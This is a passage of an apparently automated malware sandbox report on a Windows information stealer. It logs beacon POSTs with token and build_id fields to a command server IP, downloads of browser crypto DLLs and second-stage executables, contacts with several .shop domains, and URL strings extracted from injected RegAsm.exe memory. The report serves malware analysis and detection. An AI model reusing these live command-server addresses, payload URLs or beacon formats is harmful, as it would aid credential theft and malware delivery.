4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 2d 2d 0d 0a Data Ascii: ------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="token"24ebb61fa2561269400e7def790dee73------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="mode"1------CFHDBFIEGIDGIECBKJEC--
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBGHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 65 62 62 36 31 66 61 32 35 36 31 32 36 39 34 30 30 65 37 64 65 66 37 39 30 64 65 65 37 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 33 63 32 33 36 63 36 37 32 66 66 32 66 66 65 30 31 37 62 33 39 36 66 38 33 34 63 36 36 65 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 2d 2d 0d 0a Data Ascii: ------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="token"24ebb61fa2561269400e7def790dee73------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="mode"2------IIDHJKFBGIIJJKFIJDBG--
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFHHost: 147.45.68.138Content-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 65 62 62 36 31 66 61 32 35 36 31 32 36 39 34 30 30 65 37 64 65 66 37 39 30 64 65 65 37 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 33 63 32 33 36 63 36 37 32 66 66 32 66 66 65 30 31 37 62 33 39 36 66 38 33 34 63 36 36 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 2d 2d 0d 0a Data Ascii: ------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="token"24ebb61fa2561269400e7def790dee73------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="mode"21------GCBGIIECGHCAKECAFBFH--
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBKKKFHCFIDHIECGCAFHost: 147.45.68.138Content-Length: 6301Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDHIDBFBFHIJKFHCGIEHost: 147.45.68.138Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 95.164.119.162 95.164.119.162
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewASN Name: VAKPoltavaUkraineUA VAKPoltavaUkraineUA
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49740 -> 147.45.44.104:80
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: awwardwiqi.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: locatedblsoqp.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: traineiwnqo.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=fI53unXRlZI7SNoiT9of_nEXXAJBTipPy_qdTgUGuL8-1724964759-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: traineiwnqo.shop
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.68.138
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040503C InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_0040503C
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /prog/66d0cd8fb6f7b_lgjfd.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /prog/66d0cd9a65b5d_vqwergf.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficDNS traffic detected: DNS query: awwardwiqi.shop
                Source: global trafficDNS traffic detected: DNS query: locatedblsoqp.shop
                Source: global trafficDNS traffic detected: DNS query: stadiatechnologies.com
                Source: global trafficDNS traffic detected: DNS query: traineiwnqo.shop
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: awwardwiqi.shop
                Source: RegAsm.exe, 0000000C.00000002.2375283743.0000000000480000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Http://147.45.68.138:80e
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2120226733.0000000000F82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66d0cd8fb6f7b_lgjfd.exe
                Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66d0cd8fb6f7b_lgjfd.exe1kkkk1035441http://147.45.44.104/prog/66d0cd9a65b5d
                Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66d0cd8fb6f7b_lgjfd.exeorm-data;
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000F82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66d0cd9a65b5d_vqwergf.exe
                Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66d0cd9a65b5d_vqwergf.exem-data;
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138/
                Source: RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138/(
                Source: RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138/G=6f
                Source: RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138/KEBGI
                Source: RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138/b=
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138/freebl3.dll
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138/mozglue.dll
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138/mozglue.dll%
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138/msvcp140.dll
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138/msvcp140.dll?
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138/nss3.dll9b
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138/nss3.dllhb
                Source: RegAsm.exe, 0000000C.00000002.2377742353.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138/p
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138/softokn3.dll
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.000000000130C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138/sql.dll
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138/sql.dllLbz
                Source: RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138/sql.dllurer
                Source: RegAsm.exe, 0000000C.00000002.2377742353.00000000012EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138/u~
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138/vcruntime140.dll
                Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.0000000000480000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.0000000000536000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000045F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138:80
                Source: RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138:80790dee73nt-Disposition:
                Source: RegAsm.exe, 0000000C.00000002.2375283743.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138:808/2024
                Source: RegAsm.exe, 0000000C.00000002.2375283743.0000000000480000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138:80AE
                Source: RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138:80AFsrss.exe
                Source: RegAsm.exe, 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138:80CA
                Source: RegAsm.exe, 0000000C.00000002.2375283743.0000000000536000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000045F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138:80e
                Source: RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138:80form-data;
                Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138:80hellohttps://steamcommunity.com/profiles/76561199761128941b
                Source: RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.68.138:80ocal
                Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://64532127VdtSrezylanAPHTGetSystemInfoGetSystemTimeSleepkernel32.dllSymMatchStringInternetSetOp
                Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.drString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, KKJEBAAECB.exe.2.dr, freebl3.dll.2.dr, nss3[1].dll.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.drString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.drString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
